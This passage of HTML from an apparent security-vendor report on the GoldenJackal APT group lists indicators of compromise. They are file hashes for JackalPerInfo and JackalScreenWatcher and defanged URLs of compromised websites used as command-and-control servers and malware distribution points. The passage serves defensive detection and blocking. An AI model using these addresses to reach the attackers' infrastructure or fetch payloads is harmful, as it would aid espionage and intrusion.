href="https://opentip.kaspersky.com/5de309466b2163958c2e12c7b02d8384/?utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">5de309466b2163958c2e12c7b02d8384</a></p> <p><strong>JackalPerInfo</strong><br /> <a 
href="https://opentip.kaspersky.com/a491aefb659d2952002ef20ae98d7465/?utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">a491aefb659d2952002ef20ae98d7465</a></p> <p><strong>JackalScreenWatcher</strong><br /> <a href="https://opentip.kaspersky.com/1072bfeee89e369a9355819ffa39ad20/?utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">1072bfeee89e369a9355819ffa39ad20</a></p> <h3 id="legitimate-compromised-websites">Legitimate compromised websites</h3> <p><strong>JackalControl C2</strong><br /> <a href="https://opentip.kaspersky.com/http%3A%2F%2Fabert-online.de%2Fmeeting%2Fplugins.php/?utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">hxxp://abert-online[.]de/meeting/plugins[.]php</a><br /> <a href="https://opentip.kaspersky.com/http%3A%2F%2Facehigh.host%2Frobotx.php/?utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">hxxp://acehigh[.]host/robotx[.]php</a><br /> <a href="https://opentip.kaspersky.com/http%3A%2F%2Fassistance.uz%2Fadmin%2Fplugins.php/?utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">hxxp://assistance[.]uz/admin/plugins[.]php</a><br /> <a href="https://opentip.kaspersky.com/http%3A%2F%2Fcnom.sante.gov.ml%2Fcomponents%2Fcom_avreloaded%2Fviews%2Fpopup%2Ftmpl%2Fheader.php/?utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">hxxp://cnom[.]sante[.]gov[.]ml/components/com_avreloaded/views/popup/tmpl/header[.]php</a><br /> <a href="https://opentip.kaspersky.com/http%3A%2F%2Finfo.merysof.am%2Fplugins%2Fsearch%2Fcontent%2Fplugins.php/?utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">hxxp://info[.]merysof[.]am/plugins/search/content/plugins[.]php</a><br /> <a href="https://opentip.kaspersky.com/http%3A%2F%2Finvest.zyrardow.pl%2Fadmin%2Fmodel%2Fsetting%2Fplugins.php/?utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" 
rel="noopener">hxxp://invest[.]zyrardow[.]pl/admin/model/setting/plugins[.]php</a><br /> <a href="https://opentip.kaspersky.com/http%3A%2F%2Fweblines.gr%2Fgallery%2Fgallery_input.php/?utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">hxxp://weblines[.]gr/gallery/gallery_input[.]php</a><br /> <a href="https://opentip.kaspersky.com/http%3A%2F%2Fwww.wetter-bild.de%2Fplugins.php/?utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">hxxp://www[.]wetter-bild[.]de/plugins[.]php</a><br /> <a href="https://opentip.kaspersky.com/https%3A%2F%2Fajapnyakmc.com%2Fwp-content%2Fcache%2Findex.php/?utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">hxxps://ajapnyakmc[.]com/wp-content/cache/index[.]php</a><br /> <a href="https://opentip.kaspersky.com/https%3A%2F%2Fasusiran.com%2Fwp-content%2Fplugins%2Fpersian-woocommerce%2Finclude%2Fclass-cache.php/?utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">hxxps://asusiran[.]com/wp-content/plugins/persian-woocommerce/include/class-cache[.]php</a><br /> <a href="https://opentip.kaspersky.com/https%3A%2F%2Fasusiran.com%2Fwp-content%2Fthemes%2Fwoodmart%2Finc%2Fmodules%2Fcache.php/?utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">hxxps://asusiran[.]com/wp-content/themes/woodmart/inc/modules/cache[.]php</a><br /> <a href="https://opentip.kaspersky.com/https%3A%2F%2Fcroma.vn%2Fwp-content%2Fthemes%2Fcroma%2Ftemplate-parts%2Ffooter.php/?utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">hxxps://croma[.]vn/wp-content/themes/croma/template-parts/footer[.]php</a><br /> <a href="https://opentip.kaspersky.com/https%3A%2F%2Fden-photomaster.kz%2Fwp-track.php/?utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">hxxps://den-photomaster[.]kz/wp-track[.]php</a><br /> <a 
href="https://opentip.kaspersky.com/https%3A%2F%2Feyetelligence.ai%2Fwp-content%2Fthemes%2Fcms%2Finc%2Ftemplate-parts%2Ffooter.php/?utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">hxxps://eyetelligence[.]ai/wp-content/themes/cms/inc/template-parts/footer[.]php</a><br /> <a href="https://opentip.kaspersky.com/https%3A%2F%2Ffinasteridehair.com%2Fwp-includes%2Fclass-wp-network-statistics.php/?utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">hxxps://finasteridehair[.]com/wp-includes/class-wp-network-statistics[.]php</a><br /> <a href="https://opentip.kaspersky.com/https%3A%2F%2Fgradaran.be%2Fwp-content%2Fthemes%2Ftb-sound%2Finc%2Ffooter.php/?utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">hxxps://gradaran[.]be/wp-content/themes/tb-sound/inc/footer[.]php</a><br /> <a href="https://opentip.kaspersky.com/https%3A%2F%2Fmehrganhospital.com%2Fwp-includes%2Fclass-wp-tax-system.php/?utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">hxxps://mehrganhospital[.]com/wp-includes/class-wp-tax-system[.]php</a><br /> <a href="https://opentip.kaspersky.com/https%3A%2F%2Fmeukowcognac.com%2Fwp-content%2Fthemes%2Fastra%2Fpage-flags.php/?utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">hxxps://meukowcognac[.]com/wp-content/themes/astra/page-flags[.]php</a><br /> <a href="https://opentip.kaspersky.com/https%3A%2F%2Fnassiraq.iq%2Fwp-includes%2Fclass-wp-header-styles.php/?utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">hxxps://nassiraq[.]iq/wp-includes/class-wp-header-styles[.]php</a><br /> <a href="https://opentip.kaspersky.com/https%3A%2F%2Fnew.jmcashback.com%2Fwp-track.php/?utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">hxxps://new[.]jmcashback[.]com/wp-track[.]php</a><br /> <a 
href="https://opentip.kaspersky.com/https%3A%2F%2Fnews.lmond.com%2Fwp-content%2Fthemes%2Fnewsbook%2Finc%2Ffooter.php/?utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">hxxps://news[.]lmond[.]com/wp-content/themes/newsbook/inc/footer[.]php</a><br /> <a href="https://opentip.kaspersky.com/https%3A%2F%2Fpabalochistan.gov.pk%2Fnew%2Fwp-content%2Fcache%2Ffunctions.php/?utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">hxxps://pabalochistan[.]gov[.]pk/new/wp-content/cache/functions[.]php</a><br /> <a href="https://opentip.kaspersky.com/https%3A%2F%2Fpabalochistan.gov.pk%2Fnew%2Fwp-content%2Fthemes%2Fdt-the7%2Finc%2Fcache.php/?utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">hxxps://pabalochistan[.]gov[.]pk/new/wp-content/themes/dt-the7/inc/cache[.]php</a><br /> <a href="https://opentip.kaspersky.com/https%3A%2F%2Fpabalochistan.gov.pk%2Fnew%2Fwp-content%2Fthemes%2Ftwentyfifteen%2Fcontent-manager.php/?utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">hxxps://pabalochistan[.]gov[.]pk/new/wp-content/themes/twentyfifteen/content-manager[.]php</a><br /> <a href="https://opentip.kaspersky.com/https%3A%2F%2Fsbj-i.com%2Fwp-content%2Fplugins%2Fwp-persian%2Fincludes%2Fclass-wp-cache.php/?utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">hxxps://sbj-i[.]com/wp-content/plugins/wp-persian/includes/class-wp-cache[.]php</a><br /> <a href="https://opentip.kaspersky.com/https%3A%2F%2Fsbj-i.com%2Fwp-content%2Fthemes%2Fhamyarwp-spacious%2Fcache.php/?utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">hxxps://sbj-i[.]com/wp-content/themes/hamyarwp-spacious/cache[.]php</a><br /> <a href="https://opentip.kaspersky.com/https%3A%2F%2Fsokerpower.com%2Fwp-includes%2Fclass-wp-header-styles.php/?utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">hxxps://sokerpower[.]com/wp-includes/class-wp-header-styles[.]php</a><br /> <a 
href="https://opentip.kaspersky.com/https%3A%2F%2Ftechnocometsolutions.com%2Fwp-content%2Fthemes%2Fseofy%2Ftemplates-sample.php/?utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">hxxps://technocometsolutions[.]com/wp-content/themes/seofy/templates-sample[.]php</a><br /> <a href="https://opentip.kaspersky.com/https%3A%2F%2Fwww.djstuff.fr%2Fwp-content%2Fthemes%2Ftwentyfourteen%2Finc%2Ffooter.php/?utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">hxxps://www[.]djstuff[.]fr/wp-content/themes/twentyfourteen/inc/footer[.]php</a><br /> <a href="https://opentip.kaspersky.com/https%3A%2F%2Fwww.perlesoie.com%2Fwp-content%2Fplugins%2Fcontact-form-7%2Fincludes%2Fcache.php/?utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">hxxps://www[.]perlesoie[.]com/wp-content/plugins/contact-form-7/includes/cache[.]php</a><br /> <a href="https://opentip.kaspersky.com/https%3A%2F%2Fwww.perlesoie.com%2Fwp-content%2Fthemes%2Fflatsome%2Finc%2Fclasses%2Fclass-flatsome-cache.php/?utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">hxxps://www[.]perlesoie[.]com/wp-content/themes/flatsome/inc/classes/class-flatsome-cache[.]php</a></p> <p><strong>JackalSteal/JackalScreenWatcher C2</strong><br /> <a href="https://opentip.kaspersky.com/https%3A%2F%2Ftahaherbal.ir%2Fwp-includes%2Fclass-wp-http-iwr-client.php/?utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">hxxps://tahaherbal[.]ir/wp-includes/class-wp-http-iwr-client.php</a><br /> <a href="https://opentip.kaspersky.com/https%3A%2F%2Fwinoptimum.com%2Fwp-includes%2Fcustomize%2Fclass-wp-customize-sidebar-refresh.php/?utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">hxxps://winoptimum[.]com/wp-includes/customize/class-wp-customize-sidebar-refresh.php</a></p> <p><strong>Distribution websites</strong><br /> <a 
href="https://opentip.kaspersky.com/https%3A%2F%2Fwww.pak-developers.net%2Finternal_data%2Ftemplates%2Ftemplate.html/?utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">hxxps://www[.]pak-developers[.]net/internal_data/templates/template.html</a><br /> <a href="https://opentip.kaspersky.com/https%3A%2F%2Fwww.pak-developers.net%2Finternal_data%2Ftemplates%2Fbottom.jpg/?utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">hxxps://www[.]pak-developers[.]net/internal_data/templates/bottom.jpg</a></p> </div> </div> </div> <div class="c-article__footer"> <div class="c-article__categories"> <ul class="c-list-tags"> <li><a href="https://securelist.com/tag/net/" class="c-link-tag"><span>.NET</span></a></li> <li><a href="https://securelist.com/tag/apt/" class="c-link-tag"><span>APT</span></a></li> <li><a href="https://securelist.com/tag/backdoor/" class="c-link-tag"><span>Backdoor</span></a></li> <li><a href="https://securelist.com/tag/cyber-espionage/" class="c-link-tag"><span>Cyber espionage</span></a></li> <li><a href="https://securelist.com/tag/data-theft/" class="c-link-tag"><span>Data theft</span></a></li> <li><a href="https://securelist.com/tag/goldenjackal/" class="c-link-tag"><span>GoldenJackal</span></a></li> <li><a href="https://securelist.com/tag/malware/" class="c-link-tag"><span>Malware</span></a></li> <li><a href="https://securelist.com/tag/malware-descriptions/" class="c-link-tag"><span>Malware Descriptions</span></a></li> <li><a href="https://securelist.com/tag/malware-technologies/" class="c-link-tag"><span>Malware Technologies</span></a></li> <li><a href="https://securelist.com/tag/targeted-attacks/" class="c-link-tag"><span>Targeted attacks</span></a></li> </ul> </div> <div class="c-article__authors u-hidden@md"> <p class="c-title--extra-small">Authors</p> <ul class="c-list-authors"> <li> <a href="https://securelist.com/author/giampaolodedola/" > <img alt='' 
Powered by SAS: threat actors advance on new fronts</a></h3> </header> <footer class="c-card__footer"> <div class="c-card__authors"> <ul class="c-list-authors c-list-authors--comma"> <li> <a href="https://securelist.com/author/ivankwiatkowski/" > <span>Ivan Kwiatkowski</span></a> </li> <li> <a href="https://securelist.com/author/maheryamout/" > <span>Maher Yamout</span></a> </li> <li> <a href="https://securelist.com/author/noushinshabab/" > <span>Noushin Shabab</span></a> </li> <li> <a href="https://securelist.com/author/pierredelcher/" > <span>Pierre Delcher</span></a> </li> <li> <a href="https://securelist.com/author/felixaime/" > <span>Félix Aime</span></a> </li> <li> <a href="https://securelist.com/author/giampaolodedola/" > <span>Giampaolo Dedola</span></a> </li> <li> <a href="https://securelist.com/author/santiago/" > <span>Santiago Pontiroli</span></a> </li> </ul> </div> </footer> </div> </article> <article class="c-card c-card--hor-reverse@xs u-items-center"> <div class="c-card__body"> <header class="c-card__header"> <time datetime="2020-07-22T14:00:00+00:00" class="c-card__event-date"> 22 Jul 2020, 2:00pm </time> <h3 class="c-card__title c-card__title--has-icon"><a href="https://securelist.com/webinars/great-ideas-powered-by-sas-threat-hunting-and-new-techniques/" class="c-card__title-icon"><svg class="o-icon o-svg-icon o-svg-larger"><use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="https://securelist.com/wp-content/themes/securelist2020/assets/sprite/icons.svg#icon-webinar"></use></svg></a><a href="https://securelist.com/webinars/great-ideas-powered-by-sas-threat-hunting-and-new-techniques/" class="c-card__link">GReAT Ideas. 
Powered by SAS: threat hunting and new techniques</a></h3> </header> <footer class="c-card__footer"> <div class="c-card__authors"> <ul class="c-list-authors c-list-authors--comma"> <li> <a href="https://securelist.com/author/dimitrybestuzhev/" > <span>Dmitry Bestuzhev</span></a> </li> <li> <a href="https://securelist.com/author/costin/" > <span>Costin Raiu</span></a> </li> <li> <a href="https://securelist.com/author/pierredelcher/" > <span>Pierre Delcher</span></a> </li> <li> <a href="https://securelist.com/author/brian_bartholomew/" > <span>Brian Bartholomew</span></a> </li> <li> <a href="https://securelist.com/author/borislarin/" > <span>Boris Larin</span></a> </li> <li> <a href="https://securelist.com/author/arieljungheit/" > <span>Ariel Jungheit</span></a> </li> <li> <a href="https://securelist.com/author/fabioa/" > <span>Fabio Assolini</span></a> </li> </ul> </div> </footer> </div> </article> </div> </div> </div> </div> <div class="c-widget__wrapper"> <div class="js-sticky-widget"> <p><span class="c-tag c-tag--primary">From the same authors</span></p> <div class="o-row o-row--small-gutters"> <div class="o-col-12 c-card__dividers c-card__dividers--hide-first@xs c-card__dividers--show-last@xs"> <article class="c-card c-card--hor-reverse@xs u-items-center"> <a href="https://securelist.com/sidewinder-apt/114089/" class="c-card__figure" style=""> <img width="800" height="450" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/11172712/SL-SideWinder-StealerBot-featured-800x450.jpg" class="attachment-securelist-2020-thumbnail size-securelist-2020-thumbnail wp-post-image" alt="" decoding="async" loading="lazy" data-src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/11172712/SL-SideWinder-StealerBot-featured-800x450.jpg" data-srcset="" srcset="" /> </a> <div class="c-card__body"> <header class="c-card__header"> <h3 class="c-card__title"><a href="https://securelist.com/sidewinder-apt/114089/" 
class="c-card__link">Beyond the Surface: the evolution and expansion of the SideWinder APT group</a></h3> </header> </div> </article> </div> <div class="o-col-12 c-card__dividers c-card__dividers--hide-first@xs c-card__dividers--show-last@xs"> <article class="c-card c-card--hor-reverse@xs u-items-center"> <a href="https://securelist.com/toddycat-keep-calm-and-check-logs/110696/" class="c-card__figure" style=""> <img width="800" height="450" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/10/12092515/SL_featured_ToddyCat-800x450.jpg" class="attachment-securelist-2020-thumbnail size-securelist-2020-thumbnail wp-post-image" alt="" decoding="async" loading="lazy" data-src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/10/12092515/SL_featured_ToddyCat-800x450.jpg" data-srcset="" srcset="" /> </a> <div class="c-card__body"> <header class="c-card__header"> <h3 class="c-card__title"><a href="https://securelist.com/toddycat-keep-calm-and-check-logs/110696/" class="c-card__link">ToddyCat: Keep calm and check logs</a></h3> </header> </div> </article> </div> <div class="o-col-12 c-card__dividers c-card__dividers--hide-first@xs c-card__dividers--show-last@xs"> <article class="c-card c-card--hor-reverse@xs u-items-center"> <a href="https://securelist.com/toddycat/106799/" class="c-card__figure" style=""> <img width="800" height="450" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/21102251/intro_toddycat_apt-800x450.jpg" class="attachment-securelist-2020-thumbnail size-securelist-2020-thumbnail wp-post-image" alt="" decoding="async" loading="lazy" data-src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/21102251/intro_toddycat_apt-800x450.jpg" data-srcset="" srcset="" /> </a> <div class="c-card__body"> <header class="c-card__header"> <h3 class="c-card__title"><a href="https://securelist.com/toddycat/106799/" class="c-card__link">APT ToddyCat</a></h3> </header> </div> 
</article> </div> <div class="o-col-12 c-card__dividers c-card__dividers--hide-first@xs c-card__dividers--show-last@xs"> <article class="c-card c-card--hor-reverse@xs u-items-center"> <a href="https://securelist.com/transparent-tribe-part-2/98233/" class="c-card__figure" style=""> <img width="800" height="450" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/11130332/securelist_abs_5-800x450.jpg" class="attachment-securelist-2020-thumbnail size-securelist-2020-thumbnail wp-post-image" alt="" decoding="async" loading="lazy" data-src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/11130332/securelist_abs_5-800x450.jpg" data-srcset="" srcset="" /> </a> <div class="c-card__body"> <header class="c-card__header"> <h3 class="c-card__title"><a href="https://securelist.com/transparent-tribe-part-2/98233/" class="c-card__link">Transparent Tribe: Evolution analysis, part 2</a></h3> </header> </div> </article> </div> <div class="o-col-12 c-card__dividers c-card__dividers--hide-first@xs c-card__dividers--show-last@xs"> <article class="c-card c-card--hor-reverse@xs u-items-center"> <a href="https://securelist.com/transparent-tribe-part-1/98127/" class="c-card__figure" style=""> <img width="800" height="450" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/11130332/securelist_abs_5-800x450.jpg" class="attachment-securelist-2020-thumbnail size-securelist-2020-thumbnail wp-post-image" alt="" decoding="async" loading="lazy" data-src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/11130332/securelist_abs_5-800x450.jpg" data-srcset="" srcset="" /> </a> <div class="c-card__body"> <header class="c-card__header"> <h3 class="c-card__title"><a href="https://securelist.com/transparent-tribe-part-1/98127/" class="c-card__link">Transparent Tribe: Evolution analysis, part 1</a></h3> </header> </div> </article> </div> </div> </div> </div> <div class="c-widget__wrapper"> <div 
class="c-widget-subscribe js-sticky-widget"> <div class="c-block__header"> <h5 class="c-title--small">Subscribe to our weekly e-mails</h5> <p>The hottest research right in your inbox</p> </div> <div class="c-form--float-labels js-float-labels"> <script type="text/javascript"></script> <div class='gf_browser_chrome gform_wrapper gform_wrapper_original_id_11 gravity-theme subscribe-mc_wrapper' id='gform_wrapper_2497380334' ><div id='gf_2497380334' class='gform_anchor' tabindex='-1'></div><form method='post' enctype='multipart/form-data' target='gform_ajax_frame_2497380334' id='gform_2497380334' class='subscribe-mc' action='/goldenjackal-apt-group/109677/#gf_2497380334' > <div class="gform-content-wrapper"><div class='gform_body gform-body'><div id='gform_fields_2497380334' class='gform_fields top_label form_sublabel_below description_below'><div id="field_11_1" class="gfield gfield_contains_required field_sublabel_below field_description_below gfield_visibility_visible" ><label class='gfield_label screen-reader-text' for='input_2497380334_1' >Email<span class="gfield_required"><span class="gfield_required gfield_required_text">(Required)</span></span></label><div class='ginput_container ginput_container_email'> <input name='input_1' id='input_2497380334_1' type='text' value='' class='medium' placeholder='Email' aria-required="true" aria-invalid="false" /> </div></div><div id="field_11_3" class="gfield js-kaspersky-gform-recaptcha-placeholder gform_hidden field_sublabel_below field_description_below gfield_visibility_hidden" ><div class='ginput_container ginput_container_text'><input name='input_3' id='input_2497380334_3' type='hidden' class='gform_hidden' aria-invalid="false" value='' /></div></div><fieldset id="field_11_2" class="gfield input-without-label label-gdpr gfield_contains_required field_sublabel_below field_description_below gfield_visibility_visible" ><legend class='gfield_label screen-reader-text gfield_label_before_complex' ><span 
class="gfield_required"><span class="gfield_required gfield_required_text">(Required)</span></span></legend><div class='ginput_container ginput_container_checkbox'><div class='gfield_checkbox' id='input_2497380334_2'><div class='gchoice gchoice_11_2_1'> <input class='gfield-choice-input' name='input_2.1' type='checkbox' value='I agree' id='choice_2497380334_11_2_1' /> <label for='choice_2497380334_11_2_1' id='label_2497380334_11_2_1'>I agree to provide my email address to “AO Kaspersky Lab” to receive information about new posts on the site. I understand that I can withdraw this consent at any time via e-mail by clicking the “unsubscribe” link that I find at the bottom of any e-mail sent to me for the purposes mentioned above.</label> </div></div></div></fieldset></div></div> <div class='gform_footer top_label'> <button type="submit" class="gform_button button" id='gform_submit_button_2497380334' value="Sign up"> <svg class="o-icon o-svg-icon o-svg-large"><use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="https://securelist.com/wp-content/themes/securelist2020/assets/sprite/icons.svg#icon-envelope"></use></svg> <span>Subscribe</span> </button> <input type='hidden' name='gform_ajax' value='form_id=11&title=&description=&tabindex=0' /> <input type='hidden' class='gform_hidden' name='is_submit_11' value='1' /> <input type='hidden' class='gform_hidden' name='gform_submit' value='11' /> <input type='hidden' class='gform_hidden' name='gform_unique_id' value='' /> <input type='hidden' class='gform_hidden' name='state_11' value='WyJbXSIsImIwODQwZTA2ZGQ0NzYwODcyOTBkZjNmZDM1NDk2Y2ZkIl0=' /> <input type='hidden' class='gform_hidden' name='gform_target_page_number_11' id='gform_target_page_number_2497380334_11' value='0' /> <input type='hidden' class='gform_hidden' name='gform_source_page_number_11' id='gform_source_page_number_2497380334_11' value='1' /> <input type='hidden' name='gform_random_id' value='2497380334' /><input type='hidden' name='gform_field_values' 
value='securelist_2020_form_location=sidebar' /> </div> </div><p style="display: none !important;" class="akismet-fields-container" data-prefix="ak_"><label>Δ<textarea name="ak_hp_textarea" cols="45" rows="8" maxlength="100"></textarea></label><input type="hidden" id="ak_js_2" name="ak_js" value="155"/><script>document.getElementById( "ak_js_2" ).setAttribute( "value", ( new Date() ).getTime() );</script></p></form> </div> <iframe style='display:none;width:0px;height:0px;' src='about:blank' name='gform_ajax_frame_2497380334' id='gform_ajax_frame_2497380334' title='This iframe contains the logic required to handle Ajax powered Gravity Forms.'></iframe> <script type="text/javascript"> /* <![CDATA[ */ gform.initializeOnLoaded( function() {gformInitSpinner( 2497380334, 'https://securelist.com/wp-content/themes/securelist2020/assets/images/content/ajax-spinner-red.svg' );jQuery('#gform_ajax_frame_2497380334').on('load',function(){var contents = jQuery(this).contents().find('*').html();var is_postback = contents.indexOf('GF_AJAX_POSTBACK') >= 0;if(!is_postback){return;}var form_content = jQuery(this).contents().find('#gform_wrapper_2497380334');var is_confirmation = jQuery(this).contents().find('#gform_confirmation_wrapper_2497380334').length > 0;var is_redirect = contents.indexOf('gformRedirect(){') >= 0;var is_form = form_content.length > 0 && ! is_redirect && ! 
is_confirmation;var mt = parseInt(jQuery('html').css('margin-top'), 10) + parseInt(jQuery('body').css('margin-top'), 10) + 100;if(is_form){jQuery('#gform_wrapper_2497380334').html(form_content.html());if(form_content.hasClass('gform_validation_error')){jQuery('#gform_wrapper_2497380334').addClass('gform_validation_error');} else {jQuery('#gform_wrapper_2497380334').removeClass('gform_validation_error');}setTimeout( function() { /* delay the scroll by 50 milliseconds to fix a bug in chrome */ jQuery(document).scrollTop(jQuery('#gform_wrapper_2497380334').offset().top - mt); }, 50 );if(window['gformInitDatepicker']) {gformInitDatepicker();}if(window['gformInitPriceFields']) {gformInitPriceFields();}var current_page = jQuery('#gform_source_page_number_2497380334_11').val();gformInitSpinner( 2497380334, 'https://securelist.com/wp-content/themes/securelist2020/assets/images/content/ajax-spinner-red.svg' );jQuery(document).trigger('gform_page_loaded', [2497380334, current_page]);window['gf_submitting_2497380334'] = false;}else if(!is_redirect){var confirmation_content = jQuery(this).contents().find('.GF_AJAX_POSTBACK').html();if(!confirmation_content){confirmation_content = contents;}setTimeout(function(){jQuery('#gform_wrapper_2497380334').replaceWith(confirmation_content);jQuery(document).scrollTop(jQuery('#gf_2497380334').offset().top - mt);jQuery(document).trigger('gform_confirmation_loaded', [2497380334]);window['gf_submitting_2497380334'] = false;wp.a11y.speak(jQuery('#gform_confirmation_message_2497380334').text());}, 50);}else{jQuery('#gform_2497380334').append(contents);if(window['gformRedirect']) {gformRedirect();}}jQuery(document).trigger('gform_post_render', [2497380334, current_page]);} );} ); /* ]]> */ </script> </div> </div> </div> <div class="c-widget__wrapper"> <div class="js-sticky-widget"> <p><span class="c-tag c-tag--primary">In the same category</span></p> <div class="o-row o-row--small-gutters"> <div class="o-col-12 c-card__dividers 
c-card__dividers--hide-first@xs c-card__dividers--show-last@xs"> <article class="c-card c-card--hor-reverse@xs u-items-center"> <a href="https://securelist.com/eagerbee-backdoor/115175/" class="c-card__figure" style=""> <img width="800" height="450" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/12/28082809/SL-EagerBee-backdoor-featured-800x450.jpg" class="attachment-securelist-2020-thumbnail size-securelist-2020-thumbnail wp-post-image" alt="" decoding="async" loading="lazy" data-src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/12/28082809/SL-EagerBee-backdoor-featured-800x450.jpg" data-srcset="" srcset="" /> </a> <div class="c-card__body"> <header class="c-card__header"> <h3 class="c-card__title"><a href="https://securelist.com/eagerbee-backdoor/115175/" class="c-card__link">EAGERBEE, with updated and novel components, targets the Middle East</a></h3> </header> </div> </article> </div> <div class="o-col-12 c-card__dividers c-card__dividers--hide-first@xs c-card__dividers--show-last@xs"> <article class="c-card c-card--hor-reverse@xs u-items-center"> <a href="https://securelist.com/bellacpp-cpp-version-of-bellaciao/115087/" class="c-card__figure" style=""> <img width="800" height="450" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/12/19145053/SL-Bella-featured-1-800x450.jpg" class="attachment-securelist-2020-thumbnail size-securelist-2020-thumbnail wp-post-image" alt="" decoding="async" loading="lazy" data-src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/12/19145053/SL-Bella-featured-1-800x450.jpg" data-srcset="" srcset="" /> </a> <div class="c-card__body"> <header class="c-card__header"> <h3 class="c-card__title"><a href="https://securelist.com/bellacpp-cpp-version-of-bellaciao/115087/" class="c-card__link">BellaCPP: Discovering a new BellaCiao variant written in C++</a></h3> </header> </div> </article> </div> <div class="o-col-12 c-card__dividers 
c-card__dividers--hide-first@xs c-card__dividers--show-last@xs"> <article class="c-card c-card--hor-reverse@xs u-items-center"> <a href="https://securelist.com/lazarus-new-malware/115059/" class="c-card__figure" style=""> <img width="800" height="450" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/12/18184101/SL-Lazarus-multi-malware-attack-featured-800x450.jpg" class="attachment-securelist-2020-thumbnail size-securelist-2020-thumbnail wp-post-image" alt="" decoding="async" loading="lazy" data-src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/12/18184101/SL-Lazarus-multi-malware-attack-featured-800x450.jpg" data-srcset="" srcset="" /> </a> <div class="c-card__body"> <header class="c-card__header"> <h3 class="c-card__title"><a href="https://securelist.com/lazarus-new-malware/115059/" class="c-card__link">Lazarus group evolves its infection chain with old and new malware</a></h3> </header> </div> </article> </div> <div class="o-col-12 c-card__dividers c-card__dividers--hide-first@xs c-card__dividers--show-last@xs"> <article class="c-card c-card--hor-reverse@xs u-items-center"> <a href="https://securelist.com/careto-is-back/114942/" class="c-card__figure" style=""> <img width="800" height="450" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/12/12093659/SL-Careto-featured-800x450.jpg" class="attachment-securelist-2020-thumbnail size-securelist-2020-thumbnail wp-post-image" alt="" decoding="async" loading="lazy" data-src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/12/12093659/SL-Careto-featured-800x450.jpg" data-srcset="" srcset="" /> </a> <div class="c-card__body"> <header class="c-card__header"> <h3 class="c-card__title"><a href="https://securelist.com/careto-is-back/114942/" class="c-card__link">Careto is back: what’s new after 10 years of silence?</a></h3> </header> </div> </article> </div> <div class="o-col-12 c-card__dividers 
